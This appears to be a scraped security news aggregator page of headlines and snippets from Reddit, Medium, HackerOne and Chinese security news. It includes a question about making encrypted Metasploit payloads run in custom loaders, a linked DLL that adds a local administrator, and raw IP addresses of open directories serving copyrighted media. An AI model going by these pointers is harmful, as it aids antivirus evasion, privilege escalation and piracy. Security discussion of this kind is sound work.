    Module-1 | Introduction -Pentesting & Bypassing Cloud Web Application Firewall of Major Clouds
    Why you should not trust the cloud WAF?  ( 4 min )
    Vulnhub: VulnOS 2 Walkthrough
    Hey everyone, here’s a write-up of the box from vulnhub VulnOS 2. I wrote this writeup 5 months ago and am curious to share my notes (how I…  ( 7 min )
    Vulnhub: Pwned 1 Walkthrough
    Back again with the next write-up of the box from vulnhub Pwned 1. You can read the blog I just published a few moments ago, Vulnhub: VulnOS…  ( 6 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below:  ( 1 min )
  • Open

    'DoorLock' Vulnerability Can Force iOS Devices to Endlessly Reboot
    Article URL: https://www.pcmag.com/news/doorlock-vulnerability-can-force-ios-devices-to-endlessly-reboot Comments URL: https://news.ycombinator.com/item?id=29819095 Points: 2 # Comments: 0  ( 5 min )

  • Open

    Anyone use X1 to capture Facebook and are you having issues with it right now?
    Just wondering if it's just me. It's only capturing images on the first page, the rest are blank. I've tried 4 times today submitted by /u/ShadowsWandering [link] [comments]  ( 1 min )
    Automated approach to Memory Analysis
    Hello all, So we’re on a Project and being the sole one to do the task, I was wondering if there’s to some extent we can automate the Memory Analysis part! Currently, I do it using Volatility Framework! I came across Volatility Bot, but saw it was last pushed 5 years back, so step aside! Any leads could really help me in! Thanks submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    Investigating an employee
    Hello, Not sure if this is the correct location. If I'm to investigate an employee for not working during work hours, or someone with suspicious login activities, what common places will you be investigating? E.g. checking browser histories; physical security (login/logout time); docs created on DMS (files opened, accessed, etc.); recently printed docs? In other words, to know what a person is doing at work, what activities (or logs) should I be searching? submitted by /u/ram3nboy [link] [comments]  ( 1 min )
  • Open

    Staging Cobalt Strike with mTLS using Caddy — Improsec | improving security
    submitted by /u/dmchell [link] [comments]
    Can You Trust a File’s Digital Signature? New Zloader Campaign exploits Microsoft’s Signature Verification putting users at risk - Check Point Research
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    Which protocols allow authentication with AD passwords?
    SMB - 445. WINRM - 5985/6. RDP - 3389. WMI - 135/9. RPC - 5001. LDAP - 389. What more? submitted by /u/henadar [link] [comments]
    Metasploit payloads don't work with custom loaders
    Hello, I'm taking a course by Sektor7. I have the problem that, no matter in which way I try, I can't get a metasploit payload executed correctly by any loader (cpp) in the course. The program runs, but there was no meterpreter session opened any more. What I tried: simple xor encryption and decryption; simple AES encryption and decryption; even base64 encoding doesn't work for me. I also tried to research the root of the problem with no success. The source I used already was fixed for all problems any debugger gave me: The python script for aes encryption: https://pastebin.com/Qyxa3Zrr The cpp loader that decrypts and runs the payload in memory: https://pastebin.com/MfVynd45 The compiler (a custom batch): https://pastebin.com/rn6zXfqi I already tried to generate a PE with msfvenom and run it through the python, did not work. I tried to generate the raw payload with msfvenom, then encrypt it manually and put in aes key and payload into the cpp, didn't work. I tried to generate with -f raw -o 1.bin, then run the .bin through the python, didn't work. Note: Only the provided shellcodes by Sektor7 seem to work flawlessly. These have no other function besides executing the calc.exe from the System32 folder or showing basic messages. Maybe the sheer size of metasploit generated payloads or its custom functions make them go broken during the cryption and compilation process? If yes, why, and how to design the loaders so they don't break the payload? submitted by /u/janameyers2002 [link] [comments]  ( 2 min )
  • Open

    Is it too late to change path?
    Hi, I am a sysadmin for 8 years now. I am thinking to change my career path to network & security, because I see my colleagues in the security field and started to like it more and more. So my question is where to start? submitted by /u/lisi_dx [link] [comments]  ( 1 min )
    Is there any valid reason to disallow special characters from a password?
    Was helping my partner’s parents set up a password manager and they found that their bank does not allow special characters in their password. None. To me this is a red flag that indicates they aren’t sanitizing their database inputs and could be vulnerable to SQL injection. But is that overly paranoid? Is there a legitimate reason to disallow special characters? (For the record I recommended they use a long passphrase) submitted by /u/furikakebabe [link] [comments]  ( 4 min )
    A random user on omegle said my name
    Honestly a lil freaked out rn cause a random user on omegle guessed my name within 10 seconds of getting matched there. He was like “I know everything about you” and I thought he was just trolling. But then dude proceeded to say my name. He got my age wrong. I got freaked out and immediately disconnected. I don’t know much about these things. Should I be worried? Am I hacked? submitted by /u/Indecisive-blahblah [link] [comments]  ( 3 min )
    Can anyone track a deleted gmail account?
    The police are already involved in this manner, and they’ve told me it’s okay to seek outside help from any individual or a cyber forensic PI company. At my job there’s an anonymous individual that’s been sending harmful misinformation about several of my colleagues. They made a Gmail account, sent emails out to many people, and deleted the account. These emails have ruined many lives. Unfortunately the police can’t do anything, but they said once we get a positive ID we can proceed with charging them with stalking, harassment, and defamation. Just to reiterate, law enforcement is involved, and they’ve given me permission to go this route in apprehending the suspect. Could anyone assist in helping me track down the user so that I may forward the information to the police? I’ll pay. submitted by /u/deathbygoat [link] [comments]  ( 6 min )
    Could malware listen for cryptocurrency mnemonics through our devices - and what is the likelihood?
    Cryptocurrencies are often secured by a "mnemonic" which is a list of words selected from a set of 2048 standard words. If this mnemonic is compromised, all the funds can be stolen. Hypothetically, malware could listen for these 2048 keywords through the microphones on our laptops and mobile phones. Upon detecting these keywords, it could send a recording to the hacker. I'm asking this because personally I was writing down my mnemonic and then realised I had spoken the words as I was writing. My phone and laptop were in my room with me. There is no way to change my mnemonic currently, so I am hoping it has not been compromised. Do you think this kind of hack is plausible, or likely, or is it a slim possibility? Please be honest. Thank you for your time. submitted by /u/netsec-microphone-Q [link] [comments]  ( 2 min )
    Which FW brand / model do you respect or even impress you?
    Hi, The background is that I recently found out that my old Mikrotik RB750GL at home went out of support over a year ago. Since I just botched the PAN PA-200 I got for free from a friend it hit me: I have no idea what brands to avoid and what brands have a sound strategy and nice customer support for non enterprise customers. While I appreciate model recommendations my curiosity is more about a discussion about brands / models that are positioned for non commercial environment and the power user market... the why and why nots. Is there some functionality that you are surprised still isn't implemented in FWs far below the enterprise market? Is there a brand that you will do almost anything to avoid? Is there a model that should be crowned as the Bernie Madoff of firewalls? I am thinking about a SOHO appliance box that: Is below / around $200; Is not "compile OpenBSD on it and use VI to...."; As close to set and forget as you dare; Handles at least 100Mbps internet connectivity (and gigabit routing on the internal net if there's multiple ports); Netflix, Gmail etc etc needs to work without configuring every client; Deal with 2-4 users that thinks "port" has something to do with ships; VLAN capability; Simple to use VPN like Wireguard; Smart addon services that might be on a yearly / monthly basis that really is worth it? submitted by /u/mindlight [link] [comments]  ( 4 min )
    What is a good CVE/Vuln MANAGEMENT Tool?
    I have put MANAGEMENT in caps for a reason. We already have some scanners (a couple of big names) but nothing to really help MANAGE the vulns. Ideally things I'd like to be able to do: have workflows based on CVSS, e.g. scores of 7 and greater must be reviewed by X; CVE comments; adjusted CVSS for local env; mark/detect affected products/components; jira integration; ingestion from qualys/other scanners etc; integration with threat intel. Sort of like a CVE/vuln/risk specific ticketing system? At the moment we have things in a few different systems/spreadsheets and it's making things a little tough to manage, I'd really like to be able to pull everything together to be able to manage things properly. Should ideally be scanner agnostic. submitted by /u/paracausalhorse [link] [comments]  ( 4 min )
  • Open

    PPTShots - Unintentionally shared data in PowerPoint presentations
    submitted by /u/df_works [link] [comments]  ( 1 min )
    We desperately need a way to rapidly notify people of high-impact vulnerabilities, so I built one
    submitted by /u/sullivanmatt [link] [comments]  ( 5 min )
  • Open

    Subdomain takeover of images.crossinstall.com
    Twitter disclosed a bug submitted by ian: https://hackerone.com/reports/1406335
    ABLE TO TRICK THE VICTIM INTO USING A CRAFTED EMAIL ADDRESS FOR A PARTICULAR SESSION AND THEN LATER TAKE BACK THE ACCOUNT
    Mattermost disclosed a bug submitted by at11zt00: https://hackerone.com/reports/1357013 - Bounty: $150
    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
    8x8 disclosed a bug submitted by n1had: https://hackerone.com/reports/1440161
  • Open

    Using Recon-Ng for Recon for Bug Bounty
    Recon-Ng is a great tool for automating your recon workflow and is one of the must have tool for Bug bounties Continue reading on Medium »  ( 1 min )
    How I was able to spoof any Instagram username on Instagram shop
    Summary: I discovered that I can spoof any Instagram username on Instagram shop, with this bug scammers can trick people into thinking… Continue reading on Medium »  ( 1 min )
    Why we use Nmap?
    I clear this topic in 2 points 1. As a hacking or penetration testing. 2. Use in bug bounty. 1. As a Hacker- We know that nmap is network… Continue reading on Medium »  ( 1 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God. Continue reading on InfoSec Write-ups »  ( 4 min )
    Facebook android webview vulnerability : Execute arbitrary javascript (xss) and load arbitrary…
    For detail information read blog below: Continue reading on InfoSec Write-ups »
  • Open

    We’re Organizing Our First Virtual Conference cum Networking Event
    And we want you to be a part!  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    Implementing Django-rest API Throttling and Unauthenticated bypass
    In the name of God.  ( 4 min )
    Day2, Navigating Linux — 100DaysofHacking
    Day1 : Installing Kali Linux  ( 5 min )
  • Open

    My new discoveries....
    http://www4.co.black-hawk.ia.us/engineer/ - Road Establishment Records, County Aerials, Road Establishment Records https://www.ndbc.noaa.gov/data/ - So much data! http://167.114.174.132:9092/ - Movies, Series, Music, etc http://162.12.215.254/ - Movies, Android Apps and Games, Software, Tv Series submitted by /u/ManaHoney504 [link] [comments]  ( 1 min )
    Archive.org (9th Time, Jim!)
    Is not an open directory. C’mon, mods, help us out here? edit/ apparently archive.org is technically an open directory. Thanks mod for addressing this and making the community an even better place for us pirates. Rrrrrrrr, matey. edit2/ PEACE AND LOVE, this is not a post directed to anyone in specific. PEACE AND LOVE. submitted by /u/martusfine [link] [comments]  ( 2 min )
    lots of books
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Is there a better alternative for Mega and Google Drive?
    Please recommend a file sharing service that is better than the two aforementioned. I am uploading books and PDFs concerning translations and machine learning. Something quite unknown to most and not too much hassle. Not too keen on bans and removals. submitted by /u/Burlack [link] [comments]  ( 2 min )
  • Open

    Fuzzing and exploiting map parser in Teeworlds
    submitted by /u/mmmds [link] [comments]
  • Open

    Beyond the Borrow Checker: Differential Fuzzing
    Article URL: https://tiemoko.com/blog/diff-fuzz/ Comments URL: https://news.ycombinator.com/item?id=29811302 Points: 2 # Comments: 0  ( 14 min )
  • Open

    SecWiki News 2022-01-05 Review
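    Focusing on the Chaos in Algorithmic Recommendation: Building an Algorithm Security Governance System by ourren; Where Do Good Work Ideas Come From by ourren; Open Source Intelligence and Its Application in Next-Generation Cyber Security: A Literature Review by ourren; Product Graph Construction and Entity Alignment by ourren; Which Crimes Might Web Crawler Companies Commit by ourren. For more of the latest articles, visit SecWiki  ( 2 min )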
  • Open

    KNOW YOUR PUBLIC PRESENCE ONLINE
    Day in and day out people sign up for services and fast forward loose tracks of these services because they don’t use them. It will be… Continue reading on Medium »  ( 2 min )
    The OSINT-ification of ISIS on the Dark Web
    *Note: This article was originally published by the author on March 11, 2019. Continue reading on Medium »  ( 11 min )
  • Open

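    A Brief Analysis of File Control Using Processes
    The article "An Analysis of Process Creation" explained some Linux commands, process creation and process states, and worked through a few small labs. This article continues from that one, explaining some file operation commands and working through a few more small labs.  ( 1 min )
    Cyberspace Administration of China Plans to Revise the "Provisions on the Administration of Mobile Internet Application Information Services"
    On January 5, 2022, the Cyberspace Administration of China revised the "Provisions on the Administration of Mobile Internet Application Information Services", which formally took effect on August 1, 2016.
    FreeBuf Morning Briefing | DatPiff data breach affects millions; raise anti-fraud awareness and don't let screen-sharing scams succeed
    The Cyberspace Administration of China plans to revise the already implemented "Provisions on the Administration of Mobile Internet Application Information Services" and is now publicly soliciting comments.  ( 1 min )
    Purple Fox Malware Spreads Disguised as a Telegram Installer
    Unlike the way other malware spreads, the new distribution method adopted by Purple Fox further improves its stealth.  ( 1 min )
    A Review of the Serious Cyber Attacks of 2021
    A look back at the cyber attacks suffered by some entities worldwide in 2021.  ( 1 min )
    While You Watch Videos, Hackers Are Stealing Your Credit Card Information
    In this supply chain attack, the Unit42 security team found more than 100 real estate websites affected by the campaign, which means the attack was very successful.  ( 1 min )
    US Wireless Carrier UScellular Discloses a Data Breach That Occurred at Year's End
    UScellular, one of the largest wireless carriers in the United States, disclosed a data breach that occurred last December.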
  • Open

    FTC warns companies to remediate Log4j security vulnerability
    Article URL: https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=29806997 Points: 2 # Comments: 1  ( 5 min )

  • Open

    How to change my public ip manually
    I already checked that my ip is dynamic but it seems to change every long time, does anyone know how to make it change manually? I have already spent about 1 month and tried restarting the router but it did not work submitted by /u/Shark233F [link] [comments]  ( 1 min )
    Was I DDOS attacked?
    I was browsing the PHP files on a website and kept getting remote force disconnected, and after reconnecting a few times suddenly nothing would load, not even other sites like Google. Switching over to a different network and going back to the site, it worked fine. Can't confirm but it also looked like the load on the entire previous network went up. The acronyms start to run together with trying to differentiate DOS, DDOS, and DNS, DNS Flood, Ipv4, IPv6, and DDNS, so I'm wondering if this was a DDOS attack on my specific DNS. Did they try to flood the IP with traffic to stop connectivity to the internet, or was something else going on? The website was public and anyone could see the stuff, but they must have been monitoring the traffic somehow and decided to disconnect what I was looking at, but after changing over networks everything was still up in the exact same place. The network I was on was probably bigger than theirs, being some random site, and it didn't look like they brought down the whole network, so it's strange that even other sites wouldn't load. I ran a WHOIS on the site and it turned out to be some Namecheap domain running on Cloudfare server registered under a fake address, and's only been up for about 14 months. submitted by /u/NoFilterr [link] [comments]  ( 1 min )
    State-of-the-art models or techniques applies to InfoSec?
    Hello, I'd like to know about some good and innovative practices that you can't find in standard guidelines like the ISO 27001 for example. The thing is, my company is stuck in the early 2000s with a Zero Trust policy for everything (which can be bypassed easily) and this is just a pain in the ass, not efficient at all considering it just makes workers 100% dependent on IT for any requirement. So I want to ask for your advice submitted by /u/Key-Clothes-152 [link] [comments]  ( 1 min )
    Zscaler's Cloud Workload Communications protection
    Happy new Year everyone, Wonder if anyone had any experience with this so far? https://www.zscaler.com/press/zscaler-extends-its-proven-zero-trust-exchange-platform-deliver-zero-trust-workloads submitted by /u/killb0p [link] [comments]
    We all love MFA - is it a good idea to keep Google Authenticator addon in Chrome / Web Browser?
    I'm always thinking twice before installing any addon in my web browser. Very often removed it after I used it. However, there are addons designed to stay for longer. Like, google authenticator addon and alike. Q: For sake of security, is it a good idea to keep Google Authenticator addon in chrome or just forget about it and stick to the smartphone / pass-manager? submitted by /u/bitsailor [link] [comments]  ( 2 min )
    Proxy scanning(xpost r/hacking)
    so i just started looking into 0.0.0.0/0 scanning and it has shown a lot of potential so far with application like zmap and zgrab, had a lot of fun joining random minecraft server, but i would like to explore a more practical, usefull you might say, approach. when i think of scanning the internet other than vulnerable DNS servers, i think about those looooong ass free proxy lists sitting there in the open. I know, i know those are not anonymous, but i was wondering, how the duck do they get those lists, they are obviously not their servers, and to add to that proxies often have random ports, how do you scan for a service that has random ports, even then if you find a server with a port 80 or 8080 it could just be an http server out there, how do you identify it is an actual proxy, banner perhaps? ps: pls do not point out proprietary software or any if you can, i'm trying to learn here (TL;DR) i want a proxy list, made by me, and im struggling, pls help submitted by /u/filippobob [link] [comments]  ( 1 min )
    Suricata: anomaly-based detection?
    i tried Googling this, but am getting mixed messaging. It's signature based, but can detect anomalies? submitted by /u/albertcuy [link] [comments]  ( 1 min )
    tcpdump: how to keep packets that contain a substring only
    I have the following tcpdump command: sudo tcpdump -i eth0 -nn -A -s 65535 -w somepackets2.cap "(port not 443) && (less 15) && (tcp) && (greater 30)", but I want to add on another "and" condition that keeps only packets that contain "mysubstring". How can I do that? submitted by /u/social-bleach [link] [comments]  ( 1 min )
    Phishing email sent from own mail? Email spoofed or hacked?
    So, I received one those threat emails where they say my device is compromised, and the sender is myself. Phone is fine, no signs of viruses, I'm careful as well, have Adblock, have HTTPS everywhere. Google lists no suspicious activity, no traces that my mail was hacked. I changed passwords anyway, but can't help but be paranoid. I know it's possible to spoof an email address, and Google itself says the sender may not be the address shown. I was trying to see the original header with the help of a howtogeek guide, but there's no email address other than my own. Mail says it's a zero click vulnerability, that I was hacked through a website, but it all seems very unlikely. Can anyone please elaborate on this? My mail was not hacked? I'm not on have I been pwned, which is why I was extra concerned: how the heck do they have my email? submitted by /u/Unluckyclover_ [link] [comments]  ( 1 min )
    Do integer overflows also buffer overflow?
    Hi, I'm currently learning about C and the classic vulnerabilities that arise. Right now buffer overflows. So, just to sum up my understanding, an example like this will overflow because 'ab' is two bytes, which is too big to store in the last byte of "buff": char buff[10]; buff[9] = 'ab'; The wiki article about buffer overflows defines them as follows: "while writing data to a buffer, overruns the buffer's boundary" This got me thinking that this sounds a lot like integer overflows. Trying to put something into a container that it cannot contain. But let's take the following example of an integer overflow (I use unsigned char for having the most simple case): unsigned char c = 255; unsigned char cc = c + 1; Ok, so the single byte of the char cannot contain a value higher than 255, and thus it does modulo. And my understanding of integer overflow is that internally, the computer tries to put a 1 to the left of the current number, such that if 255 looks like this: 11111111 then it simply assumes that there exists a place that represents 256, and tries to create this binary number: 100000000 But there is no such bit, and therefore the number just becomes 00000000. But the single 1 that is lost, doesn't that go somewhere in memory? For that reason, my thought was that integer overflows have to also contain buffer overflows. Is this true? Further thoughts: At the core of the issue is a question of what actually constitutes a buffer in C. You could maybe argue that this problem would have been better suited for r/learnprogramming. But yeah, my guess is that it depends on whether or not a certain variable counts as a buffer. Is an int a buffer? Is a char[]? etc? submitted by /u/GarseBo [link] [comments]  ( 2 min )
    What position would be most qualified for hacking?
    From reading this I'm thinking Security Analyst would be closest https://www.cs.seas.gwu.edu/cybersecurity-roles-and-job-titles submitted by /u/cookred [link] [comments]
  • Open

    The Story Of How I Bypass MAC Filter
    Hello everyone, Continue reading on Medium »  ( 2 min )
    Day3, Computer Networks — 100DaysofHacking
    Day1 : Installing Kali Linux Continue reading on InfoSec Write-ups »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on System Weakness »  ( 3 min )
    Accessing GoDaddy internal instance through an email logic bug.
    Hey All, Continue reading on Medium »  ( 2 min )
    How to freely borrow all the TVL from the Jet Protocol
    Recently I discovered a critical vulnerability that could possibly lead to the loss of funds in the smart contract of Jet Protocol, a… Continue reading on Medium »  ( 3 min )
    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
    SQL Injection - The File Upload Playground
    Summary : Continue reading on Medium »  ( 3 min )
    Spotlight: Earn Bitcoin While Browsing The Web On Desktop And Mobile
    Is it too good to be true? Well, join me on my quest to find out. Continue reading on Medium »
  • Open

    British Tv-Episodes of The Avengers, Bergerac, TOTP, The Professionals, Coronation Street, Dr Who. (1 seri Doomwatch, Dr Who (inferno)
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Dr who literature
    submitted by /u/International_Milk_1 [link] [comments]
    Channel for old british tv stuff, mostly it would seem for kids. eg Paddinngton bear, but also dads army, one foot in the grave, etc etc.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    I have hundreds of *credible* books on corruption, parapolitics, economic warfare, propaganda, and state crimes. I’d like to share them but they are on an iCloud folder and too large to download. Is there anyway to transfer directly to Mega, please?
    submitted by /u/Few_Tumbleweed7151 [link] [comments]  ( 2 min )
    Smallish list of mostly Japanese movie and tv stuff. Some raw, some with english subs, some english dubs.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    FTP: Misc IBM software, marketing & training materials, annual reports, etc from 1994 to present
    submitted by /u/xuvatilavv [link] [comments]
    BSG Battlestar Galactica 720p Complete 2003-2012 Extras Subs
    http://37.187.18.191/tv/BSG%20Battlestar%20Galactica%20720p%20Complete%202003-2012%20Extras%20Subs/ submitted by /u/SeniorAlbatross [link] [comments]
    Anime Fansubs
    submitted by /u/International_Milk_1 [link] [comments]
    David Bowie Bootlegs
    submitted by /u/International_Milk_1 [link] [comments]
  • Open

    OPEN REDIRECT
    Nutanix disclosed a bug submitted by kauenavarro: https://hackerone.com/reports/1369806
    Buffer overflow in req_parsebody method in lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1434056 - Bounty: $2000
    %0A (New line) and limitness URL leads to DoS at all system [Main adress (https://www.acronis.com/)]
    Acronis disclosed a bug submitted by plantos: https://hackerone.com/reports/1382448
  • Open

    Sears Garage Door Signal Reverse Engineering
    submitted by /u/mdulin2 [link] [comments]  ( 1 min )
    Domain Persistence - AdminSDHolder
    submitted by /u/netbiosX [link] [comments]
    Cache Poisoning at Scale
    submitted by /u/albinowax [link] [comments]
  • Open

    SecWiki News 2022-01-04 Review
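    CodeAnalysis: Tencent Static Code Analysis by ourren; Cybersecurity Standards Practice Guide: Guidelines for Network Data Classification and Grading by ourren; Back-End Architecture Design That Withstood 10 Billion Red Envelope Requests by ourren. For more of the latest articles, visit SecWiki  ( 2 min )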
  • Open

    Top books to learn Android Hacking & Security
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

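    Quick Read: 17 Key Points of the "Cybersecurity Review Measures"
    The "Cybersecurity Review Measures" have been released; please get familiar with these key points as soon as possible.  ( 1 min )
    FreeBuf Morning Briefing | Portugal's largest media group hit by ransomware attack; Israeli media attacked on the anniversary of Soleimani's killing
    Global developments 1. Israeli media hacked on the anniversary of Soleimani's killing: On the anniversary of the killing of Islamic Revolutionary Guard Corps commander Soleimani, threat actors compromised the English-language website of the Israeli outlet The Jerusalem Post and the Twitter account of Maariv. [Foreign press - read the original] 2. Greek hackers "take over" NASA director's social media account: The personal Twitter account of NASA director Parimal Kopardekar was compromised by Greek hackers. A spokesperson for the hacker group said that this time  ( 1 min )
    Interview with Yunshu (云舒) of MoreSec (默安科技): Integrating Security into Development, Like Spring Rain Silently Nourishing Everything
    Yunshu, co-founder and CTO of MoreSec, has more than 16 years of experience in the security field, is a prominent industry voice, and is a key evangelist of the deception defense concept.  ( 1 min )
    The Five Security Topics Most Worth Watching in 2021: The Ones You Care About All Made the List
    This may indicate that, as new ways of working become "normalized", the outside world is more keen to follow innovation in cybercrime.  ( 1 min )
    The Past and Present of Security Situational Awareness
    The emergence of security situational awareness is an inevitable result of the development of national security strategy.  ( 1 min )
    Research on DNS Rebinding Attacks
    With every suspicious link you click, a DNS rebinding attack can, beyond exploiting applications vulnerable to DNS rebinding, even let an attacker instantly take control of other connected devices on your home network.  ( 1 min )
    Broward Health Discloses Data Breach Affecting More Than 1.3 Million People
    Notably, the point of intrusion was identified as a third-party medical provider, which delivers services by connecting to the healthcare system and therefore holds a certain level of access.  ( 1 min )
    On the First Day of 2022, Microsoft Exchange Could Not Send Email
    A new year begins and everything is renewed, but on the first day of 2022 Microsoft played a "joke" on everyone that was neither big nor small.  ( 1 min )
    Greek Hackers "Take Over" NASA Director's Social Media Account
    The Twitter account of NASA director Parimal Kopardekar was compromised by Greek hackers.  ( 1 min )
    Incident Response: Analyzing Outbound Connection Requests
    Handling and analysis of a malicious DNS request resolution incident  ( 1 min )
    A Review of the Prevalent Ransomware of 2021
    In 2021, manufacturing, services, construction, finance, energy, healthcare, industrial control and government organizations around the world were frequently hit by ransomware attacks, causing serious losses to global industrial output.  ( 1 min )
    Apple iOS doorLock Vulnerability Disclosed, Can "Brick" Phones
    A new persistent denial-of-service vulnerability named "doorLock" was found in Apple HomeKit, affecting system versions from iOS 14.7 to iOS 15.2.  ( 1 min )
    Four Departments Including the Cyberspace Administration Issue the "Provisions on the Administration of Algorithmic Recommendation for Internet Information Services"
    The Provisions specify that "applying algorithmic recommendation technology" means using algorithmic technologies such as generation and synthesis, personalized push, ranking and selection, retrieval and filtering, and scheduling and decision-making to provide information to users.
    Thirteen Departments Revise and Issue the "Cybersecurity Review Measures", Effective February 15, 2022
    The Measures specify that network platform operators holding the personal information of more than 1 million users must apply to the Cybersecurity Review Office for a cybersecurity review before listing abroad.
    The Big 2021 Ransomware Roundup
    Why does ransomware have so much power that every industry "turns pale at its mention"? In the face of ransomware, is "lying flat" the only option?  ( 1 min )
    A Summary of Broken Access Control Attacks in Real-World Engagements
    This article summarizes the broken access control attacks encountered in this year's penetration tests, for everyone to learn from together; if there are shortcomings or suggestions, I hope you will raise them promptly.  ( 1 min )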
  • Open

    Domain Persistence – AdminSDHolder
    Utilizing existing Microsoft features for offensive operations is very common during red team assessments as it provides the opportunity to blend in with the environment… Continue reading → Domain Persistence – AdminSDHolder  ( 3 min )
  • Open

    Solving OSINT Dojo’s 2022’s first quiz
    Today I am solving first 2022 quiz post by #OSINTDojo Continue reading on Medium »  ( 2 min )
    Claim: China operated black jail in Dubai — Open Source Analysis
    In August 2021 Associated Press (AP) reported a claim that a Chinese woman was held at a “Chinese-run secret detention facility ” in Dubai Continue reading on Medium »  ( 4 min )
  • Open

    Misconfiguration OAuth Lead Account Takeover
    Assalamuallaikum Wr.Wb Hello friends I want to explain about the bug bounty that I got in 2020, this vulnerability lies in the weak OAuth Continue reading on Medium »  ( 1 min )
  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )
  • Open

    Simple DLL that creates and adds an user to the local Administrators group
    A simple C++ DLL that creates and adds a user to the Local #Administrator group. Useful when dealing with privilege escalation on Windows to gain local administrator access and do not care of opsec. Repo: https://github.com/notdodo/adduser-dll submitted by /u/d_o_d_o_ [link] [comments]  ( 1 min )
  • Open

    doorLock: HomeKit DoS/semi-bricking Vulnerability (Via Home Invitation)
    Article URL: https://twitter.com/trevorspiniolas/status/1477185285784051712 Comments URL: https://news.ycombinator.com/item?id=29793176 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Previse from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 5 min )
    TryHackme — Cross-Site Scripting
    Malicious Script Injection  ( 3 min )
    Proof of concept: zero-day- log4j RCE
    What is log4j?  ( 3 min )
    OWASP-Access Control Vulnerability
    This article is going to focus on Access control security and Broken Access control, it will summarize the thoughts, procedures and…  ( 6 min )

  • Open

    ASK: What should I look in a Masters Program before opting it
    Hey everyone, I have been thinking of pursuing a masters in cybersecurity. I love tinkering with low level stuff, especially embedded systems and exploit development. But I don't know if the universities offer courses targeting them. Can the community suggest me some good unis that I can apply too based on my inclination. PS: Can someone also take a look at my SOP, I don't have anyone who can proofread my SOP. submitted by /u/sidhu97ss [link] [comments]  ( 1 min )
  • Open

    Basic Overview: Active Directory Hacking
    Introduction Continue reading on Medium »  ( 3 min )
    TryHackMe — Advent of Cyber 3 (2021) WriteUp
    WriteUp for all Challenges in THM Advent of Cyber 3 Continue reading on Medium »  ( 16 min )
  • Open

    Disney Channel Stuff+
    submitted by /u/International_Milk_1 [link] [comments]
    Dr Who (The original series) Seasons 1-8.
    submitted by /u/International_Milk_1 [link] [comments]
    Some old movies and Tv series
    submitted by /u/International_Milk_1 [link] [comments]
    Columbo episodes
    submitted by /u/International_Milk_1 [link] [comments]
    Mixture off BBC Radio stuff. Fact and Fiction.
    submitted by /u/International_Milk_1 [link] [comments]
    movies for the film buff
    submitted by /u/International_Milk_1 [link] [comments]
    archive.org link to Japanese movies, tv series with english subtitles filtered by title.
    submitted by /u/International_Milk_1 [link] [comments]
    large dex
    http://90.146.184.46/ submitted by /u/Dagad0s [link] [comments]
    Musikk (FLAC + MP3)
    https://85.166.158.78/RaidNAS/Lyd/Musikk/ [DIR] Atreyu/ 11-Oct-2019 23:56 - [DIR] Avenged.Sevenfold/ 08-Nov-2019 23:46 - [DIR] Bullet.For.My.Valentine/ 08-Nov-2019 23:52 - [DIR] Metallica/ 12-Oct-2019 00:06 - [DIR] Nirvana/ 12-Oct-2019 00:06 - [DIR] Papa.Roach/ 12-Oct-2019 00:08 - [DIR] Pink.Floyd/ 12-Oct-2019 00:13 - submitted by /u/Dagad0s [link] [comments]
    mostly Metallica / Nightwish (largely FLAC 24/96)
    https://seisho.us/swap/ submitted by /u/Dagad0s [link] [comments]  ( 1 min )
    Sheetmusic for (wind)band
    Nice collection of sheetmusic (scores and parts) for (wind)band https://camdencommunityband.org.au/wp-content/uploads/2019/07/ submitted by /u/notmcgvien [link] [comments]  ( 1 min )
    nice selection (FLAC \ MP3)
    http://51.198.90.160/resources/Music/ submitted by /u/Dagad0s [link] [comments]
    I made an OD browser with IMDB ratings built in
    Hey r/opendirectories! I made a web app that helps me identify poorly rated movies in open directories so I can avoid them. This post isn't to promote my project or anything -- which is why I am not disclosing the name or sharing the link to the git repo -- I am writing to gather feedback and to see if people would be interested in using it when it becomes mature enough one day. https://i.redd.it/nblwcs660f981.gif First off, why I made this tool and what the tool does: I am a casual OD user who downloads just a couple movies at a time. It's not difficult to guess that I do a lot of Google searches to decide on what I want to download -- sometimes you can go through 20+ poorly reviewed movies before seeing something decent. I wanted something I can use to rule out bad mov…  ( 3 min )
    An MSX site that links to a bunch of directories.
    Just scroll down to enjoy this neat little rabbithole. https://www.file-hunter.com submitted by /u/EmuAnon34 [link] [comments]
    "New Wave Theatre" - Episodes 1 through 25: Internet Archive. Live music from the early 1980s on Night Flight
    submitted by /u/FireHole [link] [comments]
  • Open

    Log4Shell: RCE 0-day exploit on
    U.S. Dept Of Defense disclosed a bug submitted by mr_x_strange: https://hackerone.com/reports/1429014
  • Open

    What was 2021 like for your SOC?
    What was 2021 like for your SOC? Any workflow or tool changes that made an impact? Did your team handle more or less incidents? submitted by /u/wowneatlookatthat [link] [comments]
    Phone camera related question
